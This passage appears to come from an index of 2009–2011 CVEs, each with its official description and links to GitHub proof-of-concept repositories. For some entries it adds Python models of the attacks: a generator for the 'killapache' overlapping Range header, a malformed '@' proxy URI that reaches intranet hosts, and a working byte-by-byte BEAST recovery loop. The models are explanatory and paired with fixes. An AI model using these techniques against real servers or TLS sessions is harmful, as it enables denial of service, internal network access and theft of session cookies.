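    range specs, and any set of ranges that overlap, since overlap is what multiplies
    the buffered output. Counting raw specs mirrors the mod_rewrite workaround that
    allowed at most five comma-separated entries."""
    if header.count(",") + 1 > max_ranges:
        return True
    ranges = parse_byte_ranges(header, content_length)
    if not ranges:
        return False
    ordered = sorted(ranges)
    return any(ordered[k][0] <= ordered[k - 1][1] for k in range(1, len(ordered)))

def killapache_header(n: int) -> str:
    """Shape of the header used in August 2011: 'bytes=0-,5-0,5-1,...,5-(n-1)'.
    Every satisfiable range after the first overlaps the others."""
    return "bytes=0-," + ",".join(f"5-{k}" for k in range(n))

if __name__ == "__main__":
    hdr = killapache_header(1300)
    ranges = parse_byte_ranges(hdr, 1_000_000)
    print(len(ranges), "ranges,", bytes_buffered(ranges), "bytes buffered for a 1 MB file")
    print("refuse:", is_abusive_range_request(hdr, 1_000_000))
```

Two legitimate ranges that do not overlap pass the check; two that overlap, or any request with six or more specs, are refused. For the 1300-range header and a 1 MB resource the parser shows the server buffering well over the size of the file, which is the memory-exhaustion vector.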

### CVE-2011-3368 (2011-10-05)

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

- [SECFORCE/CVE-2011-3368](https://github.com/SECFORCE/CVE-2011-3368)
- [colorblindpentester/CVE-2011-3368](https://github.com/colorblindpentester/CVE-2011-3368)
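
The reverse-proxy misconfiguration above is easy to see once the substitution is written out: a `RewriteRule ^(.*) http://backend$1 [P]` (or an equivalent `ProxyPassMatch`) appends the request-URI directly to the backend host, and Apache at the time accepted a request-URI with no leading `/`. A request line of `GET @intranet.example:22/ HTTP/1.0` therefore produces `http://backend.example:8080@intranet.example:22/`, in which the intended backend has become the userinfo part and the host is whatever the attacker chose. The following added example (not code from the page or the listed repositories) models the rule with Python's `re` and `urlsplit`; the rule patterns, host names and ports are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit

def proxied_host(rule_pattern: str, rule_target: str, request_uri: str):
    """Model of 'RewriteRule <pattern> <target> [P]' (ProxyPassMatch behaves the same):
    match the regex against the request-URI, substitute $1 into the target, and
    return the (host, port) mod_proxy would connect to. None means the rule did
    not match, so the request is not proxied at all."""
    m = re.match(rule_pattern, request_uri)
    if not m:
        return None
    url = urlsplit(rule_target.replace("$1", m.group(1)))
    return url.hostname, url.port

# Vulnerable: the capture may start with anything, including '@'. Fixed: the path
# after the backend host is always '/' + capture, so '@' can only land in the path.
VULNERABLE_RULE = (r"^(.*)",  "http://backend.example:8080$1")
FIXED_RULE      = (r"^/(.*)", "http://backend.example:8080/$1")

# Request line 'GET @intranet.example:22/ HTTP/1.0' (assumed attacker input): Apache
# 2.2.21 and earlier accept a request-URI without a leading '/', so the vulnerable
# rule yields http://backend.example:8080@intranet.example:22/ and the proxy
# connects to intranet.example:22 with 'backend.example:8080' as the userinfo.
MALFORMED_URI = "@intranet.example:22/"

if __name__ == "__main__":
    print("vulnerable:", proxied_host(*VULNERABLE_RULE, MALFORMED_URI))
    print("fixed:     ", proxied_host(*FIXED_RULE, MALFORMED_URI))
```

Requiring the leading `/` in the pattern and writing it explicitly in the target is the configuration-side fix; the server-side fix in later Apache releases additionally rejects proxy requests whose URI does not begin with `/`.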

### CVE-2011-3389 (2011-09-06)

The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.

- [mpgn/BEAST-PoC](https://github.com/mpgn/BEAST-PoC)
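
Two properties combine in the attack described above. With chained IVs (TLS 1.0 and SSL 3.0) the IV of the next record is the last ciphertext block of the previous one, so an attacker who can push chosen bytes to the front of the next record (the WebSocket, Java or Silverlight vectors listed) can make the victim encrypt any block value they choose and compare the result with an earlier ciphertext block. The "blockwise chosen-boundary" part is the alignment step: choosing the prefix length so that exactly one unknown byte sits at the end of a block, which reduces each byte to at most 256 guesses. The following is an added example, not code from the page or from the listed repository. Because the standard library has no AES, the block cipher is a keyed PRF (HMAC-SHA256 truncated to 16 bytes) standing in for AES; the attack only ever compares ciphertext blocks, so it never needs to decrypt. The cookie header, the secret and its known length are assumptions for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16
COOKIE_HDR = b"Cookie: session="   # 16 bytes; the secret follows it in every record

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

class ChainedCbcVictim:
    """Models the TLS 1.0 record layer: CBC where each record's IV is the last
    ciphertext block of the previous record. The block 'cipher' is HMAC-SHA256
    truncated to 16 bytes, a stand-in for AES chosen for this example."""

    def __init__(self, key: bytes, secret: bytes):
        self._key = key
        self._secret = secret
        self.chain = os.urandom(BLOCK)   # IV of the next record, visible on the wire

    def _E(self, block: bytes) -> bytes:
        return hmac.new(self._key, block, hashlib.sha256).digest()[:BLOCK]

    def send(self, attacker_prefix: bytes) -> list:
        """The victim (browser) sends one record: attacker-chosen bytes, then the
        secret cookie. Returns the ciphertext blocks C_0..C_n."""
        plaintext = pad(attacker_prefix + COOKIE_HDR + self._secret)
        blocks, prev = [], self.chain
        for off in range(0, len(plaintext), BLOCK):
            prev = self._E(xor(plaintext[off:off + BLOCK], prev))
            blocks.append(prev)
        self.chain = prev   # TLS 1.0: next record's IV is this record's last block
        return blocks

def beast_recover(victim: ChainedCbcVictim, secret_len: int) -> bytes:
    """Blockwise chosen-boundary attack: recover the secret one byte at a time."""
    known = b""
    for _ in range(secret_len):
        # Step 1: choose a prefix length so the next unknown byte is the LAST byte of a
        # block; the 15 bytes before it are then all known (prefix, header, recovered bytes).
        shift = (BLOCK - 1 - (len(COOKIE_HDR) + len(known))) % BLOCK
        prefix = b"A" * shift
        iv = victim.chain
        cipher = [iv] + victim.send(prefix)              # cipher[k + 1] is C_k, cipher[0] the IV
        target = shift + len(COOKIE_HDR) + len(known)    # plaintext index of the unknown byte
        i = target // BLOCK
        c_prev, c_i = cipher[i], cipher[i + 1]
        known15 = (prefix + COOKIE_HDR + known)[-(BLOCK - 1):]
        # Step 2: the next IV is known, so the attacker can make the victim encrypt exactly
        # (known15 || guess) XOR C_{i-1} as the first block of the next record. Its
        # ciphertext equals C_i iff guess == the unknown byte.
        for guess in range(256):
            candidate = known15 + bytes([guess])
            probe = xor(xor(candidate, c_prev), victim.chain)
            if victim.send(probe)[0] == c_i:
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no guess matched; model is inconsistent")
    return known

if __name__ == "__main__":
    v = ChainedCbcVictim(os.urandom(32), b"s3cr3t-id")
    print(beast_recover(v, 9))
```

The cost is at most 256 victim requests per secret byte. The fix in TLS 1.1 and later is a fresh, explicit IV per record, which removes the attacker's knowledge of the IV the probe block will be XORed with; the 1/n-1 record splitting used by browsers on TLS 1.0 breaks the same assumption by making the first block of every record unpredictable.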

### CVE-2011-3556 (2011-10-19)

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI, a different vulnerability than CVE-2011-3557.

- [sk4la/cve_2011_3556](https://github.com/sk4la/cve_2011_3556)

### CVE-2011-3872 (2011-10-27)

Puppet 2.6.x before 2.6.12 and 2.7.x before 2.7.6, and Puppet Enterprise (PE) Users 1.0, 1.1, and 1.2 before 1.2.4, when signing an agent certificate, adds the Puppet master's certdnsnames values to the X.509 Subject Alternative Name field of the certificate, which allows remote attackers to spoof a Puppet master via a man-in-the-middle (MITM) attack against an agent that uses an alternate DNS name for the master, aka "AltNames Vulnerability."

- [puppetlabs-toy-chest/puppetlabs-cve20113872](https://github.com/puppetlabs-toy-chest/puppetlabs-cve20113872)

### CVE-2011-4107 (2011-11-17)

The simplexml_load_string function in the XML import plug-in (libraries/import/xml.php) in phpMyAdmin 3.4.x before 3.4.7.1 and 3.3.x before 3.3.10.5 allows remote authenticated users to read arbitrary files via XML data containing external entity references, aka an XML external entity (XXE) injection attack.

- [SECFORCE/CVE-2011-4107](https://github.com/SECFORCE/CVE-2011-4107)

### CVE-2011-4862 (2011-12-25)

Buffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3 through 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2 and earlier, Heimdal 1.5.1 and earlier, GNU inetutils, and possibly other products allows remote attackers to execute arbitrary code via a long encryption key, as exploited in the wild in December 2011.

- [hdbreaker/GO-CVE-2011-4862](https://github.com/hdbreaker/GO-CVE-2011-4862)
- [lol-fi/cve-2011-4862](https://github.com/lol-fi/cve-2011-4862)
- [kpawar2410/CVE-2011-4862](https://github.com/kpawar2410/CVE-2011-4862)

### CVE-2011-4919 (2019-11-19)

mpack 1.6 has information disclosure via eavesdropping on mails sent by other users.

- [hartwork/mpacktrafficripper](https://github.com/hartwork/mpacktrafficripper)

### CVE-2011-5331 (2019-11-18)

Distributed Ruby (aka DRuby) 1.8 mishandles instance_eval.

- [tomquinn8/CVE-2011-5331](https://github.com/tomquinn8/CVE-2011-5331)

## 2010
### CVE-2010-0219 (2010-10-18)

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

- [veritas-rt/CVE-2010-0219](https://github.com/veritas-rt/CVE-2010-0219)

### CVE-2010-0232 (2010-01-21)

The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability."

- [azorfus/CVE-2010-0232](https://github.com/azorfus/CVE-2010-0232)

### CVE-2010-0426 (2010-02-24)

sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4, when a pseudo-command is enabled, permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file, as demonstrated by a file named sudoedit in a user's home directory.

- [t0kx/privesc-CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426)
- [cved-sources/cve-2010-0426](https://github.com/cved-sources/cve-2010-0426)
- [g1vi/CVE-2010-0426](https://github.com/g1vi/CVE-2010-0426)

### CVE-2010-0738 (2010-04-28)

The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.

- [ChristianPapathanasiou/jboss-autopwn](https://github.com/ChristianPapathanasiou/jboss-autopwn)
- [gitcollect/jboss-autopwn](https://github.com/gitcollect/jboss-autopwn)

### CVE-2010-1205 (2010-06-30)

Buffer overflow in pngpread.c in libpng before 1.2.44 and 1.4.x before 1.4.3, as used in progressive applications, might allow remote attackers to execute arbitrary code via a PNG image that triggers an additional data row.

- [mk219533/CVE-2010-1205](https://github.com/mk219533/CVE-2010-1205)

### CVE-2010-1240 (2010-04-05)

Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message.

- [Jasmoon99/Embedded-PDF](https://github.com/Jasmoon99/Embedded-PDF)
- [omarothmann/Embedded-Backdoor-Connection](https://github.com/omarothmann/Embedded-Backdoor-Connection)
- [asepsaepdin/CVE-2010-1240](https://github.com/asepsaepdin/CVE-2010-1240)

### CVE-2010-1411 (2010-06-17)

Multiple integer overflows in the Fax3SetupState function in tif_fax3.c in the FAX3 decoder in LibTIFF before 3.9.3, as used in ImageIO in Apple Mac OS X 10.5.8 and Mac OS X 10.6 before 10.6.4, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF file that triggers a heap-based buffer overflow.

- [MAVProxyUser/httpfuzz-robomiller](https://github.com/MAVProxyUser/httpfuzz-robomiller)

### CVE-2010-1622 (2010-06-21)

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

- [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc)
- [strainerart/Spring4Shell](https://github.com/strainerart/Spring4Shell)
- [HandsomeCat00/Spring-CVE-2010-1622](https://github.com/HandsomeCat00/Spring-CVE-2010-1622)
- [E-bounce/cve-2010-1622_learning_environment](https://github.com/E-bounce/cve-2010-1622_learning_environment)

### CVE-2010-1938 (2010-05-28)

Off-by-one error in the __opiereadrec function in readrec.c in libopie in OPIE 2.4.1-test1 and earlier, as used on FreeBSD 6.4 through 8.1-PRERELEASE and other platforms, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long username, as demonstrated by a long USER command to the FreeBSD 8.0 ftpd.

- [Nexxus67/cve-2010-1938](https://github.com/Nexxus67/cve-2010-1938)

### CVE-2010-2075 (2010-06-15)

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

- [MFernstrom/OffensivePascal-CVE-2010-2075](https://github.com/MFernstrom/OffensivePascal-CVE-2010-2075)
- [chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution](https://github.com/chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution)
- [FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1](https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1)
- [JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution](https://github.com/JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution)

### CVE-2010-2387 (2012-12-21)

vicious-extensions/ve-misc.c in GNOME Display Manager (gdm) 2.20.x before 2.20.11, when GDM debug is enabled, logs the user password when it contains invalid UTF8 encoded characters, which might allow local users to gain privileges by reading the information from syslog logs.

- [LogSec/CVE-2010-2387](https://github.com/LogSec/CVE-2010-2387)

### CVE-2010-2553 (2010-08-11)

The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability."

- [Sunqiz/cve-2010-2553-reproduction](https://github.com/Sunqiz/cve-2010-2553-reproduction)

### CVE-2010-3124 (2010-08-26)

Untrusted search path vulnerability in bin/winvlc.c in VLC Media Player 1.1.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wintab32.dll that is located in the same folder as a .mp3 file.

- [Nhom6KTLT/CVE-2010-3124](https://github.com/Nhom6KTLT/CVE-2010-3124)
- [KOBUKOVUI/DLL_Injection_On_VLC](https://github.com/KOBUKOVUI/DLL_Injection_On_VLC)

### CVE-2010-3332 (2010-09-22)

Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."

- [bongbongco/MS10-070](https://github.com/bongbongco/MS10-070)

### CVE-2010-3333 (2010-11-10)

Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."

- [whiteHat001/cve-2010-3333](https://github.com/whiteHat001/cve-2010-3333)
- [Sunqiz/CVE-2010-3333-reproduction](https://github.com/Sunqiz/CVE-2010-3333-reproduction)

### CVE-2010-3490 (2010-09-28)

Directory traversal vulnerability in page.recordings.php in the System Recordings component in the configuration interface in FreePBX 2.8.0 and earlier allows remote authenticated administrators to create arbitrary files via a .. (dot dot) in the usersnum parameter to admin/config.php, as demonstrated by creating a .php file under the web root.

- [moayadalmalat/CVE-2010-3490](https://github.com/moayadalmalat/CVE-2010-3490)

### CVE-2010-3600 (2011-01-19)

Unspecified vulnerability in the Client System Analyzer component in Oracle Database Server 11.1.0.7 and 11.2.0.1 and Enterprise Manager Grid Control 10.2.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from a reliable third party coordinator that this issue involves an exposed JSP script that accepts XML uploads in conjunction with NULL bytes in an unspecified parameter that allow execution of arbitrary code.

- [LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2](https://github.com/LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2)

### CVE-2010-3847 (2011-01-07)

elf/dl-load.c in ld.so in the GNU C Library (aka glibc or libc6) through 2.11.2, and 2.12.x through 2.12.1, does not properly handle a value of $ORIGIN for the LD_AUDIT environment variable, which allows local users to gain privileges via a crafted dynamic shared object (DSO) located in an arbitrary directory.

- [magisterquis/cve-2010-3847](https://github.com/magisterquis/cve-2010-3847)

### CVE-2010-3904 (2010-12-06)

The rds_page_copy_user function in net/rds/page.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel before 2.6.36 does not properly validate addresses obtained from user space, which allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls.

- [redhatkaty/-cve-2010-3904-report](https://github.com/redhatkaty/-cve-2010-3904-report)

### CVE-2010-3971 (2010-12-22)

Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."

- [nektra/CVE-2010-3971-hotpatch](https://github.com/nektra/CVE-2010-3971-hotpatch)

### CVE-2010-4221 (2010-11-09)

Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.

- [M41doror/cve-2010-4221](https://github.com/M41doror/cve-2010-4221)

### CVE-2010-4231 (2010-11-16)

Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.

- [K3ysTr0K3R/CVE-2010-4231-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT)

### CVE-2010-4476 (2011-02-17)

The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.

- [grzegorzblaszczyk/CVE-2010-4476-check](https://github.com/grzegorzblaszczyk/CVE-2010-4476-check)

### CVE-2010-4669 (2011-01-07)

The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package.

- [wrong-commit/CVE-2010-4669](https://github.com/wrong-commit/CVE-2010-4669)

### CVE-2010-4804 (2011-06-09)

The Android browser in Android before 2.3.4 allows remote attackers to obtain SD card contents via crafted content:// URIs, related to (1) BrowserActivity.java and (2) BrowserSettings.java in com/android/browser/.

- [thomascannon/android-cve-2010-4804](https://github.com/thomascannon/android-cve-2010-4804)

### CVE-2010-5230 (2012-09-07)

Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.

- [otofoto/CVE-2010-5230](https://github.com/otofoto/CVE-2010-5230)

### CVE-2010-5301 (2014-06-13)

Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a HEAD request.

- [lem0nSec/CVE-2010-5301](https://github.com/lem0nSec/CVE-2010-5301)

## 2009
### CVE-2009-0182 (2009-01-20)

Buffer overflow in VUPlayer 2.49 and earlier allows user-assisted attackers to execute arbitrary code via a long URL in a File line in a .pls file, as demonstrated by an http URL on a File1 line.

- [nobodyatall648/CVE-2009-0182](https://github.com/nobodyatall648/CVE-2009-0182)

### CVE-2009-0229 (2009-06-10)

The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability."

- [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC)

### CVE-2009-0347 (2009-01-29)

Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.

- [Cappricio-Securities/CVE-2009-0347](https://github.com/Cappricio-Securities/CVE-2009-0347)

### CVE-2009-0473 (2009-02-06)

Open redirect vulnerability in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

- [akbarq/CVE-2009-0473-check](https://github.com/akbarq/CVE-2009-0473-check)

### CVE-2009-0689 (2009-07-01)

Array index error in the (1) dtoa implementation in dtoa.c (aka pdtoa.c) and the (2) gdtoa (aka new dtoa) implementation in gdtoa/misc.c in libc, as used in multiple operating systems and products including in FreeBSD 6.4 and 7.2, NetBSD 5.0, OpenBSD 4.5, Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4, K-Meleon 1.5.3, SeaMonkey 1.1.8, and other products, allows context-dependent attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large precision value in the format argument to a printf function, which triggers incorrect memory allocation and a heap-based buffer overflow during conversion to a floating-point number.

- [Fullmetal5/str2hax](https://github.com/Fullmetal5/str2hax)

### CVE-2009-1151 (2009-03-26)

Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.

- [pagvac/pocs](https://github.com/pagvac/pocs)
- [e-Thug/PhpMyAdmin](https://github.com/e-Thug/PhpMyAdmin)

### CVE-2009-1244 (2009-04-13)

Unspecified vulnerability in the virtual machine display function in VMware Workstation 6.5.1 and earlier; VMware Player 2.5.1 and earlier; VMware ACE 2.5.1 and earlier; VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745; VMware Fusion before 2.0.4 build 159196; VMware ESXi 3.5; and VMware ESX 3.0.2, 3.0.3, and 3.5 allows guest OS users to execute arbitrary code on the host OS via unknown vectors, a different vulnerability than CVE-2008-4916.

- [piotrbania/vmware_exploit_pack_CVE-2009-1244](https://github.com/piotrbania/vmware_exploit_pack_CVE-2009-1244)

### CVE-2009-1324 (2009-04-17)

Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.

- [war4uthor/CVE-2009-1324](https://github.com/war4uthor/CVE-2009-1324)

### CVE-2009-1330 (2009-04-17)

Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.

- [adenkiewicz/CVE-2009-1330](https://github.com/adenkiewicz/CVE-2009-1330)
- [war4uthor/CVE-2009-1330](https://github.com/war4uthor/CVE-2009-1330)
- [exploitwritter/CVE-2009-1330_EasyRMToMp3Converter](https://github.com/exploitwritter/CVE-2009-1330_EasyRMToMp3Converter)

### CVE-2009-1437 (2009-04-27)

Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.

- [HanseSecure/CVE-2009-1437](https://github.com/HanseSecure/CVE-2009-1437)

### CVE-2009-1904 (2009-06-11)

The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before p173 allows context-dependent attackers to cause a denial of service (application crash) via a string argument that represents a large number, as demonstrated by an attempted conversion to the Float data type.

- [NZKoz/bigdecimal-segfault-fix](https://github.com/NZKoz/bigdecimal-segfault-fix)

### CVE-2009-2265 (2009-07-05)

Multiple directory traversal vulnerabilities in FCKeditor before 2.6.4.1 allow remote attackers to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules, as exploited in the wild for remote code execution in July 2009, related to the file browser and the editor/filemanager/connectors/ directory.

- [zaphoxx/zaphoxx-coldfusion](https://github.com/zaphoxx/zaphoxx-coldfusion)
- [h3xcr4ck3r/CVE-2009-2265](https://github.com/h3xcr4ck3r/CVE-2009-2265)
- [p1ckzi/CVE-2009-2265](https://github.com/p1ckzi/CVE-2009-2265)
- [0xConstant/CVE-2009-2265](https://github.com/0xConstant/CVE-2009-2265)

### CVE-2009-2692 (2009-08-14)

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

- [jdvalentini/CVE-2009-2692](https://github.com/jdvalentini/CVE-2009-2692)

### CVE-2009-2698 (2009-08-27)

The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.

- [xiaoxiaoleo/CVE-2009-2698](https://github.com/xiaoxiaoleo/CVE-2009-2698)

### CVE-2009-3036 (2010-02-23)

Cross-site scripting (XSS) vulnerability in the console in Symantec IM Manager 8.3 and 8.4 before 8.4.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

- [brinhosa/CVE-2009-3036](https://github.com/brinhosa/CVE-2009-3036)

### CVE-2009-3103 (2009-09-08)

Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.

- [sooklalad/ms09050](https://github.com/sooklalad/ms09050)
- [sec13b/ms09-050_CVE-2009-3103](https://github.com/sec13b/ms09-050_CVE-2009-3103)
- [Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-](https://github.com/Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-)

### CVE-2009-3555 (2009-11-09)

The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

- [johnwchadwick/cve-2009-3555-test-server](https://github.com/johnwchadwick/cve-2009-3555-test-server)

### CVE-2009-4049 (2009-11-23)

Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.

- [fengjixuchui/CVE-2009-4049](https://github.com/fengjixuchui/CVE-2009-4049)

### CVE-2009-4092 (2009-11-27)

